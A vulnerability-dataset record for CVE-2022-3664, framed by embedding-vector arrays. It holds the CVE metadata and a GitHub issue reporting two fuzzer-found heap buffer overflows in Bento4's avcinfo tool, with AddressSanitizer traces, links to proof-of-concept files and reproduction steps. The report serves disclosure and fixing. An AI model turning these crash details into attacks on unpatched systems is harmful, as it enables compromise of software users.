0.007328329142183065, -0.016205471009016037, 0.018308596685528755, 0.018275989219546318, -0.0015600211918354034, 0.00804974976927042, 0.005681696813553572, 0.01706954650580883, -0.013833342120051384, -0.010393348522484303, 0.0208682119846344, -0.020004138350486755, 0.00014443697000388056, -0.0034216532949358225, -0.016450021415948868, -0.035671599209308624, -0.013654006645083427, 0.015047937631607056, -0.003048715414479375, 0.006916671060025692, -0.00018060990259982646, -0.0017994757508859038, -0.01811295561492443, 0.02122688479721546, 0.005270038731396198, 0.00802121963351965, 0.022987641394138336, -0.0009776880033314228, 0.016498930752277374, -0.0172162763774395, 0.014338744804263115, 0.017803194001317024, 0.007715532556176186, -0.003786439308896661, 0.0020949728786945343, 0.022857213392853737, -0.006496861577033997, -0.023770198225975037, -0.006297146435827017, -0.007568802684545517, -0.02305285446345806, -0.009235814213752747, -0.006920746993273497, 0.007153069134801626, 0.040627799928188324, -0.002767483703792095, -0.007324253674596548, -0.016539689153432846, 0.007475059013813734, 0.027438439428806305, 0.01004282757639885, -0.018145563080906868, -0.021813804283738136, -0.006130037363618612, -0.014297986403107643, -0.0007331386441364884, -0.0029366302769631147, 0.058463603258132935, 0.011184058152139187, 0.02021608129143715, -0.001744452165439725, -0.006916671060025692, -0.0011269650422036648, 0.01569191738963127, 0.020949728786945343, 0.01837380975484848, 0.005188522394746542, -0.020819302648305893, 0.005983307957649231, 0.009146146476268768, 0.008983113802969456, 0.004479329101741314, -0.006170795764774084, 0.017020635306835175, -0.03236203268170357, -0.003849614644423127, 0.009406998753547668, -0.012137800455093384, -0.008575530722737312, 0.0012971305986866355, 0.002569806296378374, -0.010955811478197575, -0.008139418438076973, 0.004108429420739412, -0.002119427779689431, 0.009521122090518475, -0.027960143983364105, 0.003433880629017949, -0.0021357310470193624, 0.014338744804263115, 0.008926051668822765, 0.015096847899258137, 0.020802998915314674, -0.01061344239860773, 0.013303485698997974, 0.0036071031354367733, -0.01889551430940628, 0.020020442083477974, -0.025889625772833824, -0.00015411704953294247, -0.012659505940973759, -0.0021520345471799374, -0.003089473582804203, -0.01589570939540863, -0.019515039399266243, 0.01062974613159895, 0.026248298585414886, -0.0026431709993630648, 0.016384808346629143, 0.029525259509682655, 0.007748139090836048, 0.028498152270913124, 0.026085264980793, 0.009023871272802353, -0.012887751683592796, -0.009798278100788593, 0.0053800861351192, -0.00846956018358469, 0.0005848805885761976, 0.002498479327186942, -0.0034114636946469545, -0.00788264162838459, 0.01472187228500843, -0.009089085273444653, 0.01322196889668703, 0.008445104584097862, 0.03157947584986687, 0.015268032439053059, 0.02776450477540493, -0.02334631234407425, -0.015088696032762527, 0.0017067508306354284, -0.000859998632222414, 0.019906317815184593, 0.007336481008678675, -0.0024801380932331085, -0.0001603581476956606, 0.007833731360733509, -0.02176489308476448, -0.009855339303612709, -0.005351555533707142, 0.00654577137902379, -0.013319788500666618, -0.010874295607209206, -0.03298155963420868, -0.0177379809319973, 0.00873041246086359, 0.015039785765111446, 0.025579864159226418, -0.0110210245475173, 0.0035480037331581116, 0.005098854191601276, 0.008310602977871895, 0.003751794807612896, 0.0241288710385561, 0.006276767235249281, 0.0058039715513587, -0.012496472336351871, 0.012863297015428543, -0.016776086762547493, -0.0013450215337798, -0.01180358324199915, -0.02217247523367405, 0.001491751172579825, -0.009790126234292984, -0.023672379553318024, -0.0009027947671711445, 0.022107262164354324, 0.0005670488462783396, -0.0035622690338641405, 0.006256388034671545, 0.010311831720173359, 0.019710678607225418, 0.0019360157893970609, 0.017265185713768005, 0.00015360757242888212, 0.004171604756265879, -0.013336092233657837, 0.0021072004456073046, 0.03609548509120941, -0.006056672427803278, -0.010588987730443478, -0.021406222134828568, 0.007776669692248106, 0.03743235766887665, 0.011518275365233421, 0.003205634653568268, 0.00823723804205656, -0.0031689521856606007, 0.01967807300388813, 0.013466518372297287, 0.006769941654056311, 0.008648895658552647, -0.003130231983959675, 0.04506229609251022, -0.0011524389265105128, 0.013800735585391521, -0.007458755746483803, 0.06205032765865326, -0.012553534470498562, -0.015129454433918, -0.003586724167689681, 0.006688425317406654, -0.002963123144581914, 0.00189118180423975, -0.040595196187496185, -0.020379113033413887, 0.023884320631623268, 0.017379308119416237, 0.014224621467292309, 0.006248236168175936, -0.019091153517365456, 0.0107601722702384, 0.0014153295196592808, 0.01837380975484848, -0.00823723804205656, 0.0011310408590361476, -0.014053436927497387, 0.002928478643298149, -0.01695542223751545, -0.009203207679092884, -0.0015457557747140527, -0.0023660152219235897, 0.0014581256546080112, 0.005661318078637123, 0.0009731026948429644, -0.02122688479721546, -0.011363393627107143, 0.00043458459549583495, -0.019743286073207855, 0.0072345854714512825, 0.011999222449958324, 0.013702915981411934, 0.007760366424918175, -0.006859609857201576, -0.0006429610657505691, 0.0006842287257313728, -0.014730023220181465, -0.003484828397631645, -0.013001875020563602, 0.02138991840183735, 0.010955811478197575, 0.01624622941017151, 0.003978002816438675, 0.0021092381794005632, 0.0012757325312122703, 0.021813804283738136, 0.0026166781317442656, 0.009252117946743965, 0.011689459905028343, 0.004972503986209631, -0.022237688302993774, 0.008396195247769356, -0.00120440567843616, 0.015056089498102665, 0.016335897147655487, -0.006089279428124428, -0.018553145229816437, -0.01323827262967825, 0.012529078871011734, 0.016205471009016037 ]
CVE-2022-3664
2022-10-26T19:15:21.197000
A vulnerability classified as critical has been found in Axiomatic Bento4. Affected is the function AP4_BitStream::WriteBytes of the file Ap4BitStream.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212004.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/files/9746288/avcinfo_poc1.zip" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/794" }, { "source": "[email protected]", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.212004" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/794
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, developers of Bento4! I also found some **heap buffer overflow** bugs in avcinfo by using our fuzzing tools with ASAN. Here is details: ## Bug1 ``` ================================================================= ==48171==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000038 at pc 0x7f1ff86b4733 bp 0x7fff66ab01b0 sp 0x7fff66aaf958 READ of size 8 at 0x602000000038 thread T0 #0 0x7f1ff86b4732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) #1 0x5638f29e7432 in AP4_BitStream::WriteBytes(unsigned char const*, unsigned int) Bento4/Source/C++/Codecs/Ap4BitStream.cpp:133 #2 0x5638f29c0c69 in PrintSliceInfo Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:84 #3 0x5638f29c0c69 in main Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:172 #4 0x7f1ff7ccac86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x5638f29c1679 in _start (Bento4/avcinfo+0x5679) 0x602000000038 is located 0 bytes to the right of 8-byte region [0x602000000030,0x602000000038) allocated by thread T0 here: #0 0x7f1ff871b608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608) #1 0x5638f29ed326 in AP4_DataBuffer::ReallocateBuffer(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x5638f29ed326 in AP4_DataBuffer::SetDataSize(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa fd fa fa fa 00[fa]fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==48171==ABORTING ``` ### Poc [avcinfo_poc1.zip](https://github.com/axiomatic-systems/Bento4/files/9746288/avcinfo_poc1.zip) ## Bug2 ``` ================================================================= ==48988==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000011 at pc 0x561df275ee6e bp 0x7ffca5855570 sp 0x7ffca5855560 READ of size 1 at 0x602000000011 thread T0 #0 0x561df275ee6d in main Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:166 #1 0x7f9a9fbd8c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #2 0x561df275f679 in _start (Bento4/avcinfo+0x5679) 0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011) allocated by thread T0 here: #0 0x7f9aa0629608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608) #1 0x561df278b326 in AP4_DataBuffer::ReallocateBuffer(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x561df278b326 in AP4_DataBuffer::SetDataSize(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:166 in main Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa[01]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==48988==ABORTING ``` ### PoC [avcinfo_poc2.zip](https://github.com/axiomatic-systems/Bento4/files/9746311/avcinfo_poc2.zip) ## Verification Steps ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4 mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./avcinfo poc ``` ## Environment - Ubuntu 18.04 - clang 10.01 - Bento4 master branch [4df7274e](https://github.com/axiomatic-systems/Bento4/commit/4df7274e5e57e6219ca1e5dbdcb99ad1f7abb743) commit and version 1.6.0-639 Thanks for your time!
Some heap buffer overflow bugs exist in avcinfo
https://api.github.com/repos/axiomatic-systems/Bento4/issues/794/comments
0
2022-10-10T13:34:03
2023-05-29T02:51:50Z
https://github.com/axiomatic-systems/Bento4/issues/794
1,403,189,077
794
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Some heap buffer overflow bugs exist in avcinfo Issue date: --- start body --- Hello, developers of Bento4! I also found some **heap buffer overflow** bugs in avcinfo by using our fuzzing tools with ASAN. Here is details: ## Bug1 ``` ================================================================= ==48171==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000038 at pc 0x7f1ff86b4733 bp 0x7fff66ab01b0 sp 0x7fff66aaf958 READ of size 8 at 0x602000000038 thread T0 #0 0x7f1ff86b4732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) #1 0x5638f29e7432 in AP4_BitStream::WriteBytes(unsigned char const*, unsigned int) Bento4/Source/C++/Codecs/Ap4BitStream.cpp:133 #2 0x5638f29c0c69 in PrintSliceInfo Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:84 #3 0x5638f29c0c69 in main Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:172 #4 0x7f1ff7ccac86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x5638f29c1679 in _start (Bento4/avcinfo+0x5679) 0x602000000038 is located 0 bytes to the right of 8-byte region [0x602000000030,0x602000000038) allocated by thread T0 here: #0 0x7f1ff871b608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608) #1 0x5638f29ed326 in AP4_DataBuffer::ReallocateBuffer(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x5638f29ed326 in AP4_DataBuffer::SetDataSize(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa fd fa fa fa 00[fa]fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==48171==ABORTING ``` ### Poc [avcinfo_poc1.zip](https://github.com/axiomatic-systems/Bento4/files/9746288/avcinfo_poc1.zip) ## Bug2 ``` ================================================================= ==48988==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000011 at pc 0x561df275ee6e bp 0x7ffca5855570 sp 0x7ffca5855560 READ of size 1 at 0x602000000011 thread T0 #0 0x561df275ee6d in main Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:166 #1 0x7f9a9fbd8c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #2 0x561df275f679 in _start (Bento4/avcinfo+0x5679) 0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011) allocated by thread T0 here: #0 0x7f9aa0629608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608) #1 0x561df278b326 in AP4_DataBuffer::ReallocateBuffer(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x561df278b326 in AP4_DataBuffer::SetDataSize(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:166 in main Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa[01]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==48988==ABORTING ``` ### PoC [avcinfo_poc2.zip](https://github.com/axiomatic-systems/Bento4/files/9746311/avcinfo_poc2.zip) ## Verification Steps ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4 mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./avcinfo poc ``` ## Environment - Ubuntu 18.04 - clang 10.01 - Bento4 master branch [4df7274e](https://github.com/axiomatic-systems/Bento4/commit/4df7274e5e57e6219ca1e5dbdcb99ad1f7abb743) commit and version 1.6.0-639 Thanks for your time! --- end body ---
6,377
[ -0.041877780109643936, 0.02472386322915554, -0.018143566325306892, -0.007196658290922642, 0.056809328496456146, 0.007010013796389103, -0.04868378862738609, 0.02836993895471096, -0.02220633625984192, 0.03529748320579529, 0.007001332938671112, -0.0041040051728487015, 0.01712787337601185, 0.04052352532744408, 0.004978629294782877, -0.003416025312617421, -0.01802203059196472, 0.0006809262558817863, -0.005173954647034407, -0.021129874512553215, 0.017058424651622772, -0.010894820094108582, -0.02130349725484848, 0.02599130943417549, -0.009879128076136112, 0.031825028359889984, -0.024307169020175934, 0.012735220603644848, 0.0007916107424534857, 0.012188308872282505, 0.016546238213777542, 0.019063765183091164, -0.019619358703494072, 0.014862097799777985, 0.04583637788891792, 0.003557093907147646, 0.04851016402244568, 0.0594831146299839, -0.006567276082932949, 0.04194723069667816, 0.00752220069989562, -0.05729547142982483, -0.016233716160058975, 0.024671776220202446, -0.02109515108168125, 0.007348577957600355, 0.02652953937649727, -0.022015349939465523, -0.025001659989356995, 0.011051081120967865, 0.007183636538684368, -0.0031013344414532185, -0.02312653511762619, -0.04291951656341553, 0.01173689030110836, -0.01810884103178978, -0.015981964766979218, 0.003819698002189398, 0.02119932323694229, 0.018612347543239594, 0.002038980834186077, 0.006567276082932949, 0.008299161680042744, 0.030140889808535576, 0.03791918605566025, -0.00859432015568018, -0.014506171457469463, 0.015764934942126274, -0.011537224054336548, 0.020209675654768944, -0.017796320840716362, -0.02666843682527542, 0.011285471729934216, 0.02665107510983944, 0.032745230942964554, -0.0006131049594841897, 0.018421361222863197, 0.017935218289494514, -0.02633855491876602, 0.04139163717627525, -0.024411343038082123, 0.04100966826081276, -0.057920511811971664, 0.02689414657652378, 0.0457669273018837, 0.0061505818739533424, -0.06024705618619919, -0.07021299749612808, -0.005959596950560808, -0.04194723069667816, 0.004496826324611902, -0.00885041430592537, 0.038787297904491425, -0.023716852068901062, -0.008616023696959019, 0.044134873896837234, -0.02517528273165226, -0.015695486217737198, -0.07045606523752213, -0.016988975927233696, -0.031078452244400978, -0.0070968251675367355, 0.01845608651638031, -0.003867444349452853, 0.012301163747906685, 0.00757862813770771, 0.00006290429882938042, -0.019966604188084602, 0.007014354690909386, 0.11486873775720596, 0.029654746875166893, 0.010052750818431377, -0.012040729634463787, 0.01515725627541542, -0.006901499815285206, -0.000483159237774089, 0.02154656872153282, -0.019445735961198807, -0.05969146266579628, -0.010191649198532104, 0.016850076615810394, -0.02437661774456501, 0.013985303230583668, 0.0077522508800029755, -0.04934355244040489, 0.04475991800427437, 0.0018848907202482224, 0.005356258247047663, -0.009419027715921402, -0.02109515108168125, -0.03029715083539486, -0.04600999876856804, 0.007144571747630835, -0.022258421406149864, -0.0059118508361279964, -0.003891317406669259, 0.001234891009517014, 0.06351116299629211, 0.004974288400262594, 0.001953254686668515, -0.036287132650613785, -0.014497490599751472, 0.01538296602666378, 0.02130349725484848, -0.026234380900859833, -0.01604273170232773, -0.011632717214524746, 0.029481124132871628, -0.028543561697006226, 0.001785057713277638, 0.0040627699345350266, -0.019115852192044258, 0.029672108590602875, 0.025591976940631866, 0.059760913252830505, -0.022275784984230995, 0.01984506845474243, 0.06403202563524246, 0.001688480144366622, -0.023421693593263626, 0.012136222794651985, -0.043822355568408966, 0.011242065578699112, -0.02618229389190674, 0.009740229696035385, -0.04646141827106476, 0.018855419009923935, 0.0037372272927314043, -0.011884469538927078, 0.039933208376169205, 0.01788313128054142, -0.009002333506941795, 0.009002333506941795, 0.027189305052161217, -0.07618561387062073, -0.007066441234201193, 0.018959593027830124, 0.034012675285339355, -0.012674452736973763, -0.02234523370862007, -0.010070113465189934, 0.0031013344414532185, -0.004622702952474356, 0.005503837484866381, 0.054378610104322433, -0.012405337765812874, 0.024446068331599236, -0.04771150276064873, 0.0067495801486074924, -0.029238052666187286, 0.019619358703494072, 0.004709513857960701, 0.00728781009092927, -0.003570115426555276, 0.0373983159661293, -0.00882002990692854, -0.030453409999608994, -0.022501494735479355, 0.011762933805584908, 0.013533884659409523, 0.007010013796389103, -0.030939554795622826, -0.041634708642959595, 0.005920532159507275, -0.008073452860116959, 0.022414682433009148, -0.006701834034174681, 0.05090615898370743, 0.016910845413804054, 0.0069535868242383, -0.039238717406988144, -0.02962002158164978, 0.017969943583011627, 0.025453079491853714, -0.020435385406017303, 0.009427709504961967, -0.036495476961135864, 0.008772283792495728, -0.03201601281762123, 0.001813271432183683, 0.02974155731499195, -0.009245405904948711, 0.013143233954906464, -0.025348905473947525, -0.038335878401994705, -0.011129210703074932, -0.013230045326054096, 0.01685875840485096, 0.0030752909369766712, -0.012648409232497215, 0.029984628781676292, -0.013368942774832249, -0.04194723069667816, -0.016641730442643166, 0.012639728374779224, -0.024584965780377388, -0.012040729634463787, -0.0014182799495756626, 0.0003599956980906427, 0.018838055431842804, -0.004861433990299702, 0.030210338532924652, -0.033318184316158295, -0.01981034316122532, 0.016259759664535522, 0.03621768206357956, -0.015244067646563053, 0.017865769565105438, -0.009757592342793941, 0.02461968921124935, 0.007214020472019911, -0.011320196092128754, 0.013282131403684616, 0.022379959002137184, 0.005230382084846497, 0.028335213661193848, 0.02003605291247368, 0.008958928287029266, -0.02449815347790718, -0.04906575754284859, 0.023213347420096397, -0.01667645387351513, -0.012153584510087967, 0.0001023424047161825, -0.011007674969732761, 0.0046704490669071674, 0.011033718474209309, 0.012752583250403404, -0.03352653235197067, -0.0380580835044384, 0.06069847568869591, 0.008320865221321583, -0.031477782875299454, -0.025591976940631866, -0.035037048161029816, -0.004609681200236082, 0.0057642715983092785, 0.006966608576476574, 0.004023704677820206, -0.008364270441234112, 0.002085641957819462, 0.03363070636987686, -0.0061419010162353516, 0.029932543635368347, 0.0014464935520663857, -0.0032380621414631605, -0.00014920695684850216, -0.010408677160739899, -0.03272786736488342, -0.0052390629425644875, -0.001909849001094699, 0.01270049624145031, -0.06104572117328644, -0.0025804664473980665, 0.007995322346687317, 0.019306836649775505, -0.011945237405598164, 0.006806007586419582, -0.046635039150714874, -0.0025631042663007975, -0.02902970463037491, -0.018299825489521027, -0.0001624999422347173, 0.020331211388111115, -0.026408003643155098, 0.0024437387473881245, -0.028543561697006226, 0.025210006162524223, -0.008077792823314667, -0.007908510975539684, 0.014627707190811634, -0.04656559228897095, -0.017587972804903984, -0.033665429800748825, -0.05444806069135666, -0.0035853073932230473, -0.006198327988386154, -0.007930213585495949, -0.03453354164958, 0.014540895819664001, -0.01869915798306465, -0.0032424028031527996, -0.037328869104385376, 0.03442936763167381, 0.00160275399684906, -0.01298697292804718, 0.00012038288696203381, 0.018994316458702087, -0.06052485108375549, 0.010738559998571873, 0.004425207152962685, -0.01197128091007471, -0.016650410369038582, -0.03534957021474838, 0.006532551720738411, -0.026581626385450363, -0.03635657951235771, 0.011606673710048199, 0.02243204414844513, -0.003478963626548648, -0.022171610966324806, 0.006068111397325993, -0.019758256152272224, 0.004483804572373629, -0.023873113095760345, -0.008833051659166813, 0.00600734306499362, -0.009314854629337788, 0.024081459268927574, 0.0019250409677624702, 0.0017058424418792129, 0.041634708642959595, 0.014028709381818771, 0.026703162118792534, -0.0007156507926993072, -0.012092816643416882, -0.025244731456041336, 0.007574287708848715, 0.02474122680723667, -0.018976954743266106, -0.008472784422338009, -0.030001992359757423, -0.010165605694055557, 0.028613010421395302, 0.03295357525348663, 0.011893150396645069, -0.009080464020371437, 0.015643399208784103, -0.015287472866475582, -0.014080796390771866, -0.030349237844347954, 0.057712163776159286, -0.02835257723927498, 0.019792981445789337, -0.018317189067602158, -0.035835713148117065, 0.030731206759810448, 0.009835722856223583, -0.04364873096346855, 0.007786975242197514, -0.03234589844942093, -0.000006438788659579586, 0.05500365048646927, -0.05076725780963898, 0.0006125623476691544, 0.010061431676149368, -0.008833051659166813, 0.029116516932845116, -0.00022313221415970474, -0.022831376641988754, -0.04423904791474342, 0.0687892884016037, -0.006797326263040304, -0.04500298947095871, -0.01673722267150879, 0.01823037676513195, -0.028213677927851677, -0.017770277336239815, 0.009818360209465027, -0.04486408829689026, 0.022640392184257507, 0.021685468032956123, 0.00990517158061266, -0.001677628722973168, -0.006736558396369219, 0.06382368505001068, 0.022171610966324806, 0.003433387726545334, 0.01493154652416706, -0.0076220338232815266, 0.027415014803409576, -0.009071783162653446, -0.04090549424290657, -0.018994316458702087, 0.042884793132543564, 0.04427377134561539, 0.001773121184669435, 0.008047409355640411, -0.016155585646629333, 0.0014030879829078913, -0.01579097844660282, 0.018490811809897423, 0.014167606830596924, 0.024775950238108635, 0.02609548345208168, 0.02576559968292713, -0.020331211388111115, 0.030818019062280655, 0.012058092281222343, -0.028856081888079643, 0.0013358091237023473, 0.013386305421590805, -0.006901499815285206, 0.00734423752874136, -0.013933217152953148, -0.03213755041360855, -0.007062100805342197, -0.04739898070693016, -0.015452414751052856, -0.04236392304301262, -0.025887135416269302, 0.03528011962771416, -0.022414682433009148, -0.028040055185556412, 